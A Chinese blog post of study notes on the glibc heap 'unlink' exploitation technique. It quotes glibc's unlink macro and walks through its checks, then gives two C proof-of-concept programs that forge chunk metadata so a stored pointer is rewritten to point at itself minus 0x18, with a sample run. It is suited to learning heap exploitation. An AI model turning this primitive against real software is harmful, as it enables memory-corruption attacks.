c语言 unlink,unlink 漏洞笔记

最新推荐文章于 2024-07-11 15:28:57 发布
最新推荐文章于 2024-07-11 15:28:57 发布
阅读量692 收藏 2
点赞数 1
文章标签: c语言 unlink

前导知识

malloc_chunk 结构

struct malloc_chunk {

INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */

INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */

struct malloc_chunk* fd; /* double links -- used only if free. */

struct malloc_chunk* bk;

/* Only used for large blocks: pointer to next larger size. */

struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */

struct malloc_chunk* bk_nextsize;

};

部分字段的具体的解释如下

fd,bk。 chunk 处于分配状态时,从 fd 字段开始是用户的数据。chunk 空闲时,会被添加到对应的空闲管理链表中,其字段的含义如下

fd 指向下一个(非物理相邻)空闲的 chunk

bk 指向上一个(非物理相邻)空闲的 chunk

通过 fd 和 bk 可以将空闲的 chunk 块加入到空闲的 chunk 块链表进行统一管理

fd_nextsize, bk_nextsize,也是只有 chunk 空闲的时候才使用,不过其用于较大的 chunk(large chunk)。

fd_nextsize 指向前一个与当前 chunk 大小不同的第一个空闲块,不包含 bin 的头指针。

bk_nextsize 指向后一个与当前 chunk 大小不同的第一个空闲块,不包含 bin 的头指针。

一般空闲的 large chunk 在 fd 的遍历顺序中,按照由大到小的顺序排列。这样做可以避免在寻找合适 chunk 时挨个遍历。

我们在利用 unlink 所造成的漏洞时,其实就是对进行 unlink chunk 进行内存布局,然后借助 unlink 操作来达成修改指针的效果。

我们先来简单回顾一下 unlink 的目的与过程,其目的是把一个双向链表中的空闲块拿出来(例如 free 时和目前物理相邻的 free chunk 进行合并)。其基本的过程如下

c45bde7eabdb68220d7c58b7f7389b23.png

然我们先来看看源码:

glibc-2.27/malloc/malloc.c:1403

/* Take a chunk off a bin list */

#define unlink(AV, P, BK, FD) { \

if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \

malloc_printerr ("corrupted size vs. prev_size"); \

FD = P->fd; \

BK = P->bk; \

if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \

malloc_printerr ("corrupted double-linked list"); \

else { \

FD->bk = BK; \

BK->fd = FD; \

if (!in_smallbin_range (chunksize_nomask (P)) \

&& __builtin_expect (P->fd_nextsize != NULL, 0)) { \

if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \

|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \

malloc_printerr ("corrupted double-linked list (not small)"); \

if (FD->fd_nextsize == NULL) { \

if (P->fd_nextsize == P) \

FD->fd_nextsize = FD->bk_nextsize = FD; \

else { \

FD->fd_nextsize = P->fd_nextsize; \

FD->bk_nextsize = P->bk_nextsize; \

P->fd_nextsize->bk_nextsize = FD; \

P->bk_nextsize->fd_nextsize = FD; \

} \

} else { \

P->fd_nextsize->bk_nextsize = P->bk_nextsize; \

P->bk_nextsize->fd_nextsize = P->fd_nextsize; \

} \

} \

} \

}

由于glibc-2.23的源码没有size检查,但是发行的库中却有size检查,所有鄙人用glibc-2.27的源码。

size检查

if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0)) \

malloc_printerr ("corrupted size vs. prev_size"); \

由于 P 已经在双向链表中,所以有两个地方记录其大小,所以检查一下其大小是否一致。

双向链表完整性检查

FD = P->fd; \

BK = P->bk; \

if (__builtin_expect (FD->bk != P || BK->fd != P, 0)) \

malloc_printerr ("corrupted double-linked list"); \

检查 fd 和 bk 指针。

双向链表完整性检查

if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0) \

|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0)) \

malloc_printerr ("corrupted double-linked list (not small)"); \

这个平常不怎么用到,是对于 large bin 的检查。

核心部分

FD->bk = BK; \

BK->fd = FD; \

即通过此方式,P 的指针指向了比自己低 12 的地址处。此方法虽然不可以实现任意地址写,但是可以修改指向 chunk 的指针,这样的修改是可以达到一定的效果的。

利用思路

条件

UAF ,可修改 free 状态下 smallbin 或是 unsorted bin 的 fd 和 bk 指针

已知位置存在一个指针指向可进行 UAF 的 chunk

效果

使得已指向 UAF chunk 的指针 ptr 变为 ptr - 0x18

思路

设指向可 UAF chunk 的指针的地址为 ptr

修改 fd 为 ptr - 0x18

修改 bk 为 ptr - 0x10

触发 unlink

ptr 处的指针会变为 ptr - 0x18。

代码举例

原理就如下面的代码所示:

#include

#include

// 机器字长,64位机器为8,32位机器为4

#define MACHINE_SIZE (sizeof(void *))

struct malloc_chunk

{

size_t prev_size; /* Size of previous chunk (if free). */

size_t size; /* Size in bytes, including overhead. */

struct malloc_chunk *fd; /* double links -- used only if free. */

struct malloc_chunk *bk;

/* Only used for large blocks: pointer to next larger size. */

struct malloc_chunk *fd_nextsize; /* double links -- used only if free. */

struct malloc_chunk *bk_nextsize;

};

int main()

{

struct malloc_chunk *chunk1, *chunk2;

char *ptr1, *ptr2;

// 不要申请fastbin

ptr1 = malloc(0x80);

ptr2 = malloc(0x80);

chunk1 = ptr1 - 2 * MACHINE_SIZE;

chunk2 = ptr2 - 2 * MACHINE_SIZE;

free(ptr1);

chunk1->fd = ((char *)&chunk1) - 3 * MACHINE_SIZE;

chunk1->bk = ((char *)&chunk1) - 2 * MACHINE_SIZE;

fprintf(stderr, "Starting chunk1: %p ; &chunk1: %p\n", chunk1, &chunk1);

// 触发unlink

free(ptr2);

fprintf(stderr, "Then chunk1: %p ; &chunk1: %p\n", chunk1, &chunk1);

fprintf(stderr, "%p(&chunk1) - %p(chunk1) = %d\n", &chunk1, chunk1,

(char *)&chunk1 - (char *)chunk1);

return 0;

}

一般情况下的unlink漏洞举例

要点

修改下一个相邻chunk的prev_size,使其与构造的假chunk相对应。

修改下一个相邻chunk的prev_in_use位为未使用状态。

一般都是由heap overflow来实现上述操作的。

#include

#include

// 机器字长,64位机器为8,32位机器为4

#define MACHINE_SIZE (sizeof(void *))

int main()

{

char *ptr1, *ptr2;

// 不要申请fastbin

ptr1 = malloc(0x80);

ptr2 = malloc(0x80);

// *(size_t *)ptr1 = 0;

// *(size_t *)(ptr1 + MACHINE_SIZE) = 0x80;

// fake_chunk->fd, ensures fake_chunk->fd->bk == fake_chunk

*(void **)(ptr1 + 2 * MACHINE_SIZE) = (char *)&ptr1 - 3 * MACHINE_SIZE;

// fake_chunk->bk, ensures fake_chunk->bk->fd == fake_chunk

*(void **)(ptr1 + 3 * MACHINE_SIZE) = (char *)&ptr1 - 2 * MACHINE_SIZE;

// 修改ptr2的chunk的prev_size ,使得其指向fake_chunk

*(size_t *)(ptr2 - 2 * MACHINE_SIZE) = (*(size_t *)(ptr1 - 1 * MACHINE_SIZE)

- 2 * MACHINE_SIZE) & (-8) ; // 去除低 3 bit的状态标记

// 修改ptr2的chunk的 prev_in_use 为未使用状态

*(size_t *)(ptr2 - MACHINE_SIZE) -= 1;

fprintf(stderr, "Starting ptr1: %p ; &ptr1: %p\n", ptr1, &ptr1);

// 触发unlink

free(ptr2);

fprintf(stderr, "Then ptr1: %p ; &ptr1: %p\n", ptr1, &ptr1);

fprintf(stderr, "%p(&ptr1) - %p(ptr1) = %ld\n", &ptr1, ptr1,

(char *)&ptr1 - (char *)ptr1);

return 0;

}

运行实例(环境:glibc-2.23)

ex@ubuntu:~/test$ gcc main.c -o main

ex@ubuntu:~/test$ ./main

Starting ptr1: 0x1020010 ; &ptr1: 0x7ffeb72fdb88

Then ptr1: 0x7ffeb72fdb70 ; &ptr1: 0x7ffeb72fdb88

0x7ffeb72fdb88(&ptr1) - 0x7ffeb72fdb70(ptr1) = 24

ex@ubuntu:~/test$

总结

像unlink这种比较抽象的漏洞需要多多写几遍他的C语言漏洞实例以保持手感,要不然时间过久了,再次看到unlink的话就会变得很生疏。

0

0

vote

Article Rating

weixin_39806948
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
漏洞之unlink1
08-04
unlink 漏洞利用技巧的核心就在下面这几行代码:SP00F|版权属于我个人所有,你可以用于学习,但不可以用于商业目的漏洞利用的技巧就是覆盖相邻(下一个或下下
unlink命令 删除指定文件
01-20
unlink命令用于系统调用函数unlink去删除指定的文件。和rm命令作用一样 ,都是删除文件。 语法格式:unlink [参数] 常用参数: –help 显示帮助 –version 显示版本号 参考实例 删除test文件: [root@...
C语言 unlink函数
life_liver的专栏
01-29 1088
功能:删除一个名字(某些情况下删除这个名字所指向的文件) 头文件:#include 函数原型: int unlink(const char* pathname);   功能详解:unlink从文件系统中中删除一个名字,若这个名字是指向这个文件的最后一个链接,并且没有进程处于打开这个文件的状态,则删除这个文件,释放这个文件占用的空间。            如果这个名字是指向这个文件的最后一个链
c++ tbb多线程报错corrupted size vs. prev_size while consolidating
最新发布
xyc859666356的博客
07-11 313
背景:使用了 parallel_for 去代替单线程的 for 循环,导致对 vector 的访问读写操作发生了冲突。解决:使用 tbb 的多线程安全容器 concurrent_vector 替换 vector 即可。
C语言之unlink函数
yekui006的博客
03-06 472
功能:删除一个名字(某些情况下删除这个名字所指向的文件) 头文件:#include<unistd.h> 函数原型: int unlink(const char* pathname); 功能详解:unlink从文件系统中中删除一个名字,若这个名字是指向这个文件的最后一个链接,并且没有进程处于打开这个文件的状态,则删除这个文件,释放这个文件占用的空间。 如果这个名字是指向这个文件的最后一个链接,但有某个进程处于打开这个文件的状态,则暂时不删除这个文件,要等到打开这个文件的进程关闭这个文
C 语言unlink 函数
黑夜中的斗狼
09-02 1070
相关函数:link, rename, remove 头文件:#include 定义函数:int unlink(const char * pathname); 函数说明:unlink()会删除参数pathname 指定的文件. 如果该文件名为最后连接点, 但有其他进程打开了此文件, 则在所有关于此文件的文件描述词皆关闭后才会删除. 如果参数pathname 为一符号连接, 则此连
初级堆溢出-unlink漏洞
weixin_34395205的博客
09-30 278
Linux下堆的unlink漏洞 参考文章:https://blog.csdn.net/qq_25201379/article/details/81545128 首先介绍一下Linux的堆块结构: struct malloc_chunk { INTERNAL_SIZE_T prev_size; INTERNAL_SIZE_T size; struct malloc_chunk *f...
node.js中的fs.unlink方法使用说明
10-25
在fs模块中,fs.unlink方法用于删除文件。 使用fs.unlink方法之前,首先需要引入fs模块。通过require方法引入fs模块,例如var fs = require('fs')。引入模块后,fs unlink方法可以被调用执行删除文件的操作。fs....
Linux unlink函数和删除文件的操作方法
01-09
在Linux系统中,`unlink`函数是用于删除文件或软链接的关键函数。它遵循特定的规则来决定何时真正从磁盘上移除文件内容。理解`unlink`的工作原理有助于我们更好地掌握Linux文件系统的操作。 1. **unlink函数**: `...
php中unlink()、mkdir()、rmdir()等方法的使用介绍
10-27
`unlink()`, `mkdir()`, 和 `rmdir()` 是三个关键的函数,用于处理文件和目录的操作。下面将详细介绍这三个函数的用法和注意事项。 1. **unlink() 函数**: `unlink()` 用于删除指定的文件。其基本语法是 `unlink...
Linux下unlink函数的使用
yhcasey的博客
10-14 944
一、头文件 #include<unistd.h> 二、函数原型 int unlink(const char *pathname); 三、函数介绍 unlink()函数功能即为删除文件。执行unlink()函数会删除所给参数指定的文件。 注意: 执行unlink()函数并不一定会真正的删除文件,它先会检查文件系统中此文件的连接数是否为1,如果不是1说明此文件还有其他链接对象,因此只对此文件的连接数进行减1操作。若连接数为1,并且在此时没有任何进程打开该文件...
unlink漏洞
human!的专栏
11-02 591
http://wonderkun.cc/index.html/?p=651
heap 漏洞 unlink
samohyes的博客
06-05 530
看了好久没看懂、、、一知半解,把链接放这里,慢慢看内存管理机制https://jaq.alibaba.com/community/art/show?spm=a313e.7916648.0.0.680125d6KB9x2z&amp;articleid=334漏洞利用http://manyface.github.io/2016/05/19/AndroidHeapUnlinkExploitPractic...
Unlink漏洞利用总结
WateranFire的博客
09-21 406
一般是连续的smallbin或者unsortbin堆块(双向链表)a,b,a可以溢出,有一个指针p指向a。在a上伪造一个堆块: pre_size size fd : p - 3*SIZE_SZ bk : p - 2*SIZE_SZ 其中SIZE_SZ=sizeof(size_t) 此外还需让b的SIZE最低位被溢出修改为0,即PREV_INUSE为0,并将PREV_SIZE设置为伪造堆块的大小。 之后执行free(b),由于检测到PREV_INUSE为0,对a执行un.
unlink函数
sdnxiaotao的专栏
07-05 1432
unlink函数(删除文件)使用格式如下:retval = unlink(filename) ;在运行完上述系统调用后,如果成功,则系统会返回0给变量retval,如果运行失败,则系统会返回-1给变量retval。Code:include "lyl.h"main(int argc,char *argv[]){ i
【堆漏洞-unlink
m0_52343643的博客
04-06 525
当一个堆块(非fastbin)释放时,libc会先看其相邻的堆块是否空闲,空闲的话就将这个相邻堆块从bins中取出,并与当前释放堆块合并,而这个bins中取出堆块的过程就是unlink
c语言中unlink()函数详解
热门推荐
Wmll1234567的博客
08-14 1万+
头文件:#include &lt;unistd.h&gt; 定义函数:int unlink(const char * pathname); 函数说明:unlink()会删除参数pathname 指定的文件. 如果该文件名为最后连接点, 但有其他进程打开了此文件, 则在所有关于此文件的文件描述词皆关闭后才会删除. 如果参数pathname 为一符号连接, 则此连接会被删除。 返回值:成功则返回0, ...
堆溢出——unlink漏洞攻击(bamboobox)
fzucaicai的博客
03-22 800
当要free掉某个堆块时,如果其低地址的chunk是空闲的,那么这里的P就是被释放掉的堆块的地址减去自己的pre_size里的数值,这样就可以指向低地址的chunk的chunk头了,通过堆溢出修改掉被释放的chunk的pre_size和size,就可以达到释放该chunk时,unlink调用的P是是指向假chunk的chunk头。1.首先检查被合并的chunk的大小是否正确,程序会先检查被合并的chunk的size是否与其物理相连的下一个chunk的presize是否相符。
Linux 二进制漏洞挖掘入门系列之(六)堆块中的 unlink
个人笔记
08-03 939
当我们在使用 free() 函数的时候,就是释放一块内存,这是宏观上的表现。深究起来,堆管理器(ptmalloc)会检查其物理相邻的堆块(chunk)是否空闲,如果空闲,则需要将其从所在的 bin (small bins)中释放出来,与当前 free 的 chunk 进行合并,合并之后,再插入到 unsorted bins 中。在这个过程中,**unlink 就是释放空闲堆块**。这个过程中,如果我们可以构造物理相邻的 chunk,那么就有可能造成**任意地址写**。
unlink pwn
08-25
在计算机安全领域,"unlink"是一种常见的堆溢出攻击利用技术。它利用了"Use-After-Free"漏洞,该漏洞在释放内存后仍然使用该内存的指针。 在具体的实现中,"unlink"攻击需要使用全局变量,并进行多次写入。攻击者通过修改堆上的数据结构,使得被释放的堆块的前后指针指向了攻击者想要控制的地址。 下面是"unlink"攻击的主要步骤: 1. 攻击者需要一个全局指针变量p,该变量指向一个堆块。 2. 攻击者通过修改p的fd和bk指针,将p链接到自身的前后堆块上。 3. 攻击者检查p->fd->bk和p->bk->fd是否都指向p,如果不是,则意味着堆块链表被破坏,攻击失败。 4. 如果上述检查通过,攻击者将p->fd->bk指向p的前一个堆块,将p->bk->fd指向p的后一个堆块,完成"unlink"操作。 5. 攻击者可以利用这个被解链的堆块进行任意的内存写入或执行其他操作,从而实现对程序的控制。 总结起来,"unlink"攻击利用了堆溢出漏洞中的"Use-After-Free"漏洞,并通过修改堆块的前后指针来实现对程序的控制。这是一种常见的攻击技术,需要仔细的堆结构分析和理解。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [【pwn学习】堆溢出(三)- Unlink和UAF](https://blog.csdn.net/Morphy_Amo/article/details/122631424)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [pwn unlink](https://blog.csdn.net/qq_37433000/article/details/103500857)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值